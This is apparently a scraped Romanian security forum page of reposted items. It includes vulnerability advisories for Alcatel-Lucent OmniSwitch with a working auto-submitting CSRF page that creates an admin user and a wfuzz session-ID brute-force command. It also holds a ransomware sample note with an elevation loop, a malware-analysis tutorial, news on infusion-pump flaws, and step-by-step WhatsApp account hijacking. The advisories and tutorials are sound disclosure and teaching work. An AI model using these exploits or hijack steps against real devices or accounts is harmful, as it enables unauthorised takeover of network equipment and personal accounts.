&EmWeb_ns:mip:246.T1:O2=-1 &EmWeb_ns:mip:248.T1:O3= &EmWeb_ns:mip:249.T1:O4=1 &EmWeb_ns:mip:250.T1:O5=4 This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed. In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following: POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1 Host: [...] Cookie: session=sess_15739 Content-Type: application/x-www-form-urlencoded Content-Length: 167 EmWeb_ns:mip:2.T1:I1=attacker &EmWeb_ns:mip:4.T1:O1= &EmWeb_ns:mip:5.T1:O2= &EmWeb_ns:mip:6.T1:O3=4294967295 &EmWeb_ns:mip:7.T1:O4=4294967295 This request sets all access privileges for the user "attacker" and is again completely predictable. Proof of Concept ================ Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch: ------------------------------------------------------------------------ <html> <head> <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title> </head> <body> <form action="" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" /> <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> ------------------------------------------------------------------------ Workaround ========== Disable the web interface by executing the following commands: AOS6: no ip service http no ip service secure-http AOS 7/8: ip service http admin-state disable If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface. Fix === Upgrade the firmware to a fixed version, according to the vendor the fixed versions will be available at the end of July 2015. Security Risk ============= If attackers trick a logged-in administrator to visit an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH Source
  16. Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate as a currently logged-in user and perform administrative tasks. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855 Affected Versions: AOS 6.4.5.R02 AOS 6.4.6.R01 AOS 6.6.4.R01 AOS 6.6.5.R02 Fixed Versions: AOS AOS Vulnerability Type: Session Management - low identifier entropy Security Risk: high Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-003 Advisory Status: published CVE: CVE-2015-2804 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2804 Introduction ============ "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage) More Details ============ The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. A switch with the example IP is accessible via the following URL: A client is then redirected to the following URL: For unauthenticated users the URL displays a login form and sets a session cookie with a session ID. A request to the URL with the command line HTTP client cURL shows the Set-Cookie header: $ curl -I HTTP/1.1 200 OK Date: Tue, 17 Mar 2015 08:25:42 GMT Server: Agranat-EmWeb/R5_2_4 [...] Set-Cookie: session=sess_11012;PATH=/ The session cookie has the name "session" and its value begins with the string "sess_". By repeatedly requesting the URL with cURL it became obvious that the suffix is always a number between 1 and 32,000. This suggests that there are only about 32,000 possible session IDs, resulting in only 15 bits of entropy. Our tests showed that it was possible to get a throughput of about 50 HTTP requests per second, this means that in order to try every possible session ID an attacker will need at most 11 minutes. On average, the time it takes to find a valid session ID for an active user is even lower. Proof of Concept ================ For an attacker it is very easy to distinguish between a valid and an invalid session ID by looking at the HTTP response size. During our tests, requesting an invalid session ID always returned the login form, which was 3027 bytes in length. With a valid session ID, the management web interface is returned by the webserver and the response is larger. A number of requests in the range of the possible session cookies can be easily executed using wfuzz [0]: ------------------------------------------------------------------------ ./wfuzz.py -z range,1-32000 --hl 3027 -H "Cookie: session=sess_FUZZ" ------------------------------------------------------------------------ Workaround ========== Administrators should avoid using the management web interface and use the serial console or administrate the switch over SSH instead. The web interface can be disabled by executing the following commands: no ip service http no ip service secure-http If the web interface is needed, it must be ensured that only authorised persons are able to even connect to the web server. In addition, the HTTP session timeout can be lowered to one minute with the following command: session timeout http 1 Fix === Upgrade the firmware to a fixed version. Security Risk ============= The vulnerability poses a high risk. An attacker can easily authenticate to a switch with the privileges of another user who is currently logged in. The attack is simple and fast. The only precondition is that a user is already using the switch during the attack. Attackers might actively trick administrators into logging in by social engineering. Timeline ======== 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released References ========== [0] https://github.com/xmendez/wfuzz RedTeam Pentesting GmbH Source
  17. Salutare Andrei! Sper sa stai cat mai mult printre noi.
  18. Si totusi nu cred ca au pretins a fi parte din CIA. De ce? Cel mai probabil cei de la "1337day" au folosit scuza cu CIA iar un client nemultumit i-a ars. Oricum cat credeau ca o sa le mearga?
  19. Cryptographic ransom. Delivered via email. Smart install maker -> Delphi. In attach dropper and extracted ransom. Installs to %Program Files%, runs via HKLM Run key. Used https://github.com/SnakeDoctor/FGInt Changing desktop wallpaper to it own with ransom message. Wallpaper can be found inside ransom resources. Email: trojanencoder@aol.com Target extensions Autoelevate in loop pExecInfo.cbSize = 60; pExecInfo.hwnd = GetFocus(); pExecInfo.fMask = 1280; pExecInfo.lpVerb = "runas"; pExecInfo.lpFile = (LPCSTR)sub_404E98(); pExecInfo.lpParameters = (LPCSTR)sub_404E98(); pExecInfo.nShow = 1; while ( !ShellExecuteExA(&pExecInfo) ) Sleep_0(0x7D0u); VT https://www.virustotal.com/en/file/add92cb6047f2fb412dcbcb5a2d8ee7fad56091ccd6667105d977b010a33b561/analysis/1433824692/ https://www.virustotal.com/en/file/94f36b586379137a58862ca46cd1cd6c01c20ea9f56755f7b193f0c97b7a57bd/analysis/1433824702/ Derivative of this https://securelist.ru/blog/issledovaniya/24070/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/ ( use google translate ) Download pass: infected Source
  20. Browsing should be private' says NSA overlord Black Hat Barack has issued a Memorandum – an executive order in all but name, and an instrument the president has used more than any of his predecessors – to all Federal website sysadmins, informing them to deprecate HTTP and roll on with HTTPS. The HTTPS-Only Standard was proposed by the US' Chief Information Officer Tony Scott, formerly of VMWare. Though the standard has been criticised by a database admin at NASA as a "top-down solution", it has also been described as a "great first step" by the American Civil Liberties Union. The Memorandum [PDF] itself states that "all browsing activity should be considered private and sensitive". The standard is intended to eliminate "inconsistent, subjective determinations across agencies regarding which content or browsing activity is sensitive in nature", Tony Scott said. Source
  21. ) dar faza este ca pronunta "nasa" gresit... ========================================== Oricum daca au ajuns sa-i ia interviu lu' Guccifer care e vai de el si isi merita fiecare an petrecut in puscarie sunt vai capul lor. Doamne, asta in loc sa aiba copii si familie la varsta lui se tine de prostii pe care le fac copii de 13/14 ani ce au comunitati de gaming. EPIC TROLL! Update name to: " SucSiFier " Nu inteleg de ce promoveaza doar rahaturile astea ce dau bine "comercial" ....
  22. Static Malware Analysis Starting here, I would like to share the results of my recent research into malware analysis. We will begin with some basics and proceed to advanced levels. In this first installment, we will discuss the techniques involved in static analysis of malware. I will also include some files for illustrative purposes in this document. Before we directly move onto the analysis part, let us set up context with some definitions. What is Malware? Malware is any software that does something that causes detriment to the user, computer, or network—such as viruses, trojan horses, worms, rootkits, scareware, and spyware. Malware Static Analysis Basic static analysis consists of examining the executable file without viewing the actual instructions. Basic static analysis can confirm whether a file is malicious, provide information about its functionality, and sometimes provide information that will allow you to produce simple network signatures. Basic static analysis is straightforward and can be quick, but it’s largely ineffective against sophisticated malware, and it can miss important behaviors. Enough with definitions — let’s get down to Malware Static Analysis Techniques. Malware Static Analysis Techniques Uploading the results to VirusTotal The very first technique in static analysis is to upload the suspicious executable to VirusTotal, which runs the executable against several AV solutions and gives the result. For example, the below file states that the detection ratio is 17 out of 57. Finding strings Searching through the strings can be a simple way to get hints about the functionality of a program. For example, if the program accesses a URL, then you will see the URL accessed stored as a string in the program. Microsoft has a utility called “Strings”. When Strings searches an executable for ASCII and Unicode strings, it ignores context and formatting, so that it can analyse any file type and detect strings across an entire file (though this also means that it may identify bytes of characters as strings when they are not). Strings searches for a three-letter or greater sequence of ASCII and Unicode characters, followed by a string termination character. Below are some examples of strings from which important information can be revealed. Using the Strings utility, files can be searched with following command at the cmd: Strings <filename> Example 1: Below is a string extraction of keywords from a malicious executable. As we can see, it gives us good information that functions like “FindNextFileA” and “FindFirstFileA”, which shows that this executable will search for a file, and then combining that with “CopyFileA” means that it will find a file and replace it with another file. Another important point to note that is about “Kerne132.dll”. This is a misleading text and should not be confused with “Kernel32.dll”. Example 2: Below is another extraction from a string utility. It shows us that usage of “CreateProcessA” will create a process. Commands like “Exec” and “sleep” are used to control a remote file. It can be a bot as well, and then an IP field, which can be the IP of a controlling server. Example 3: Below is another example of an extraction using Strings. Interesting fields are “InternetOpenURLA” which states that it will connect with some external server to download something, and then we have a http:// file also, which even clarifies the server address from which it will connect and download. How to check if a malware code is obfuscated or not? Often malware writers obfuscate their codes so that the files are hard to read. When a packed program runs, a wrapper program also runs around to unpack it. With static analysis, it is really hard to predict which files are packed unless it is clearly evident that they are. For example, tools like PEid sometimes are able to tell that the files are packed. In the below figure, it is clearly evident that files are packed with UPX. Files which are UPX packed can be unpacked by the following command: upx –o <newfilename> -d <packedfilename> PE file sections ETHICAL HACKING TRAINING – RESOURCES (INFOSEC) Information gathering from Portable Executable (PE) file format PE file format is used by Windows executables, DDLs etc. It contains the necessary information for Windows OS loader to run the code. While examining the PE files, we can analyse which functions have been imported, exported and what type of linking is there i.e. runtime, static or dynamic. PE file sections A PE file contains a header and some more important sections. Under these sections there is some useful information. Let’s understand these sections as well. .text: This contains the executable code. .rdata: This sections holds read only globally accessible data. [.data: Stores global data accessed through the program. .rsrc: This sections stores resources needed by the executable. Most often malware writers use dynamic linking in their code. For example, with the use of the tool Dependency Walker, we can see in the below screenshot that under WININET.dll are functions like “InternetOpenUrlA”, which states that this malware will make a connection with some external server. Note: Wininet.dll contains higher level networking functions that implement protocols such as FTP, HTTP and NTP. Under the header, there is a subsection named “IMAGE_FILE_HEADER”, which contains the timestamp field. This timestamp shows the compile time of the executable. This is very important information, since if the time is old, then there may a case that AV solutions might have a signature around it. However, this field is not reliable, since the compile can be changed easily by the malware writer. Suppose from static analysis, an analyst predicts that the executable will create a process and then suppose the following exec and sleep command is found, but there is no information found about the respective DLL, which has a function to connect with another server. In that case, the resource is hidden with the executable. Open the .rsrc section of PE file with a tool like Resource Hacker to gain more information regarding the malware. Below is the analysing of the above resource using PEview. As we have learnt with static analysis, there is very little information that can be gathered, but it is very useful too. In a coming article, I will bring in dynamic analysis though basic to the rescue. Source MALWARE ANALYSIS BASICS - PART 2 Dynamic Analysis Techniques As we have covered the malware analysis basics with static techniques here, this post is all about performing the basic analysis of malware using dynamic technique. As we have seen in the previous post, the ability to fully perform malware analysis is very much restricted using static techniques either due to obfuscation, packing, or the analyst having exhausted the available static analysis techniques. Precautions Before performing dynamic malware analysis, be sure to do it in a safe environment. Consider deploying a Windows virtual machine and using VMware for provisioning virtual machines. You should also take a snapshot of the virtual machine before executing the malicious binaries so that the safe state can be easily restored. Analyzing with Process Monitor Process Monitor is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, network, process, and thread activities. Process Monitor monitors all system calls it can gather as soon as it is run. Since there are always huge number of calls being made in the Windows OS, it is sometimes impractical to discover important events. Process Monitor helps this issue with a filter tab through which we can filter by the type of calls. For example, see the screenshot below. It shows that I have applied a filter with operation of “WriteFile” and “RegSetValue”. These are usually the call made by a malicious executable to write the file onto the disk and to make registry changes. After applying the filter, we get a list of following events in Process Monitor. The most important are the top two entries which shows the execution of file and creation of registry entry with a new entry named “Video Driver.” Other entries can be ignored as it is usual for pseudorandom numbers to be generated. On clicking the first entry, we can even see that what action that call has made. As is clear from the screenshot below, a total 7168 bytes have been written to the file system by this binary. Analyzing with Process Explorer Process Explorer is a tool used for performing dynamic analysis and can give you a great insight onto the processes currently running onto the system. Below is an example of the process being created after running a binary. Clicking on process can help you reveal whether the process has created any mutant or not. Also it can give you all the information about the DLLs being used by the function. Below, the screenshot shows that the process uses ws2_32.dll, which means that a network connection will be made by this process. Double clicking a particular process will yield more information about the process. Some of the important attributes are: Verify Option. There is a verify option in every process to check whether that binary is signed by the MS or not. Below, the screenshot depicts that this binary is not signed by the MS. Threads will showcase the number of threads associated with this process. Strings tab can help in determining whether there is any process replacement occur or not. If two strings are drastically different then the process replacement might have occur. Below, the screenshot shows that strings in the executable both on disk and in memory. Using INetSim INetSim is a free Linux based suite for simulating common Internet services. It is sometimes difficult to analyze a malware without letting it complete execute the code and that can involve contacting the outer world for services over http, https, FTP etc. INetSIM does exactly this by emulating services like Http, Https, FTP and allows analyst to analyze the behaviour of malware. Since this is Linux based, the best way to use this is to install it on a Linux machine and keep it in the same network as that of windows testing machine. INetSIM can serve any type of request that the malware might request for. For example, suppose a malware requests for an image from the for tis code to execute. INetSIM can fulfil the request of the malware though the image will not be what malware will be looking for but it will keep the malware to keep executing the code. INetSIM can also log all the request from the client regardless of the port. This can be used to record all the data sent from malware. In the next series, we will move to advanced techniques of malware analysis using both static and dynamic analysis. Source
  23. WHEN SECURITY RESEARCHER Billy Rios reported earlier this year that he’d found vulnerabilities in a popular drug infusion pump that would allow a hacker to raise the dosage limit on medication delivered to patients, there was little cause for concern. Altering the allowable limits of a particular drug simply meant that if a caregiver accidentally instructed the pump to give too high or too low a dosage, the pump wouldn’t issue an alert. This seemed much less alarming than if the pumps had vulnerabilities that would allow a hacker to actually alter the dosage itself. Now Rios says he’s found the more serious vulnerabilities in several models of pumps made by the same manufacturer, which would allow a hacker to surreptitiously and remotely change the amount of drugs administered to a patient. “This is the first time we know we can change the dosage,” Rios told WIRED. The vulnerabilities are known to affect at least five models of drug infusion pumps made by Hospira—an Illinois firm with more than 400,000 intravenous drug pumps installed in hospitals around the world. The vulnerable models include the company’s standard PCA LifeCare pumps; its PCA3 LifeCare and PCA5 LifeCare pumps; its Symbiq line of pumps, which Hospira stopped selling in 2013 due to concerns raised by the FDA over other quality and safety issues with the pumps; and its Plum A+ model of pumps. Hospira has at least 325,000 of the latter model alone installed in hospitals worldwide. These are the systems that Rios knows are vulnerable because he’s tested them. But he suspects that the company’s Plum A+3 and its Sapphire and SapphirePlus models are equally vulnerable too. Hospira did not respond to a request for comment. Earlier this year, Rios went public with information about a different security issue with Hospira’s LifeCare pumps. This one involved drug libraries used with the pumps, which help set upper and lower boundaries for dosages of intravenous drugs a pump can safely administer. Because the libraries don’t require authentication, Rios found that anyone on the hospital’s network—including patients in the hospital or a hacker accessing the pumps over the Internet—can load a new drug library that alters the limits for a drug. At the time he publicly disclosed the library vulnerability, Rios told WIRED that he had not yet found any vulnerabilities that would allow him to actually alter a drug dosage, though he was working on it. But he now acknowledges that he had found these more serious vulnerabilities in the LifeCare pumps at the time and had in fact reported them to Hospira and the FDA last year. At the time he hadn’t yet tested a Plum A+ pump, however. The new vulnerabilities would allow attackers to remotely alter the firmware on the pumps, giving them complete control of the devices and the ability to alter dosages delivered to patients. And because the pumps are also vulnerable to the previous library vulnerability he disclosed, an attacker would be able to first raise the dosage above the maximum limit before delivering a potentially deadly dosage without the pump issuing an alert. How the Firmware Security Flaw Works The problem lies with a communication module in the LifeCare and Plum A+ pumps. Hospitals use the communication modules to update the libraries on the pumps. But the communication modules are connected via a serial cable to a circuit board in the pumps, which contains the firmware. Hospira uses this serial connection to remotely access the firmware and update it. But hackers can use it for the same purpose. The serial connection would be less of a concern if Hospira’s pumps accepted only legitimate firmware updates that were authenticated and digitally signed. But Rios says they’ll accept any update, which means anyone can alter the software on the pumps. “And if you can update the firmware on the main board, you can make the pump do whatever you like,” Rios says. A hacker could not only change the dosage of drugs delivered to a patient but also alter the pump’s display screen to indicate a safe dosage was being delivered. The compromise of the communication module and serial cable doesn’t automatically mean a compromise of the pump. An attacker needs to know how to perform a firmware update. But Rios says it didn’t take him long to figure it out. Hospira Denied Problem With Pumps Rios says when he first told Hospira a year ago that hackers could update the firmware on its pumps, the company “didn’t believe it could be done.” Hospira insisted there was “separation” between the communications module and the circuit board that would make this impossible. Rios says technically there is physical separation between the two. But the serial cable provides a bridge to jump from one to the other. “From an architecture standpoint, it looks like these two modules are separated,” he says. “But when you open the device up, you can see they’re actually connected with a serial cable, and they’re connected in a way that you can actually change the core software on the pump.” An attacker wouldn’t need physical access to the pump. The communication modules are connected to hospital networks, which are in turn connected to the Internet. “You can talk to that communication module over the network or over a wireless network,” Rios warns. Hospira knows this, he says, because this is how it delivers firmware updates to its pumps. Yet despite this, he says, the company insists that “the separation makes it so you can’t hurt someone. So we’re going to develop a proof-of-concept that proves that’s not true.” He plans to demonstrate a proof-of-concept attack next month at the SummerCon security conference in Brooklyn, New York. Rios says when he warned Hospira a year ago about the firmware problem in its LifeCare pumps, he advised the company to perform what’s called a variant analysis to determine if its other models of pumps were affected as well, but the company refused, saying the problem was confined to the LifeCare line. To prove Hospira wrong, Rios purchased and tested one of the company’s Plum A+ drug pumps and found that it had the same firmware issue. Last month, the FDA issued an alert about the firmware issue, but only in reference to Hospira’s LifeCare PCA3 and PCA5 pumps. The alert didn’t mention the other models, which could lead hospitals to believe they don’t have a security risk. Rios contacted the FDA last week to tell the agency that the vulnerability extended to Hospira’s Plum A+ line as well, but he says the federal agency asked him to withhold the finding from the public until Hospira had time to verify the issue. But Rios declined, saying Hospira had already had a year to test the Plum A+ pumps and determine if the problem extended to them, but had declined to do so. He said hospitals needed to know now that the pumps are putting patients at risk. The FDA did not respond to a request for comment. Rios is planning to obtain models from Hospira’s Sapphire line of pumps as well to prove that they’re equally vulnerable to the issue. Source
  24. Until now Unix and Linux system administrators have to download a third-party SSH client software like Putty on their Windows machines to securely manage their machines and servers remotely through Secure Shell protocol or Shell Session (better known as SSH). This might have always been an awkward feature of Windows platform, as it lacks both – a native SSH client software for connecting to Linux machines, and an SSH server to support inbound connections from Linux machines. But… Believe it or not: You don't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to OpenSSH community in an effort to deliver better SSH support in the PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transferring and network port forwarding. This is not first time Microsoft has planned to adopt SSH for its Windows platform, the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will update more information on when users can expect SSH support shortly. Source
  25. The hugely popular smartphone messaging service WhatsApp, acquired by Facebook for over $20 billion last year, has reportedly been found to be prone to hijacking without unlocking or knowing your device password, making its hundreds of Millions of users vulnerable to, not just hackers, but also non-technical people. This trick lets anyone surrounds you to get effectively control over your WhatsApp account. The attacker needs nothing more than a phone number of the target person and access to the target mobile phone for a few seconds, even if it is locked. Hacking Whatsapp account in such scenario is not hard for your friends and colleagues. This is not actually a loophole or vulnerability in WhatsApp, and rather it is just the way WhatsApp is designed and its account setup mechanism works. NOTE: Moreover, we aren’t encouraging users to hack others WhatsApp account, but the purpose of publishing this article is to warn and remind our readers that you should be extra careful to whom you lend your mobile phone and not to leave it unattended for longer durations with strangers around. The trick enables the offender to get full control over the victim’s WhatsApp account in no time and the most surprising part is that it independently works on all mobile platforms, including Android, Windows and Apple’s iOS. Here’s How to Hijack someone else’s WhatsApp Account? Below are the clear steps to hack the WhatsApp account on any Smartphones: Begin by setting up a WhatsApp account on a new mobile phone using the phone number of your target. During the setup process, WhatsApp will call the target’s phone number and will provide a PIN that needs to be entered for the authentication of the account. If you already have access to the victim’s phone, you can just answer the phone call and grab the code with no efforts. Even if the victim has a lock screen enabled on the phone, you can receive the phone call to get the secret PIN. Using this known and simple trick your colleagues can hijack your WhatsApp Account easily. The worst case is with iPhones: Things get even worse on iPhone if the users have configured their iPhones with Siri authentication for the lock screen, because all the contact details are available to access the Siri’s settings, effectively giving everyone access to their phone number without the need for a PIN. Thus, if you try to steal the account information of WhatsApp, without even having the phone number of the target user, you can just call your number from target’s phone using Siri. Just check the given video demonstration that explains the simple trick of taking control of anyone’s WhatsApp account. Source
  • Create New...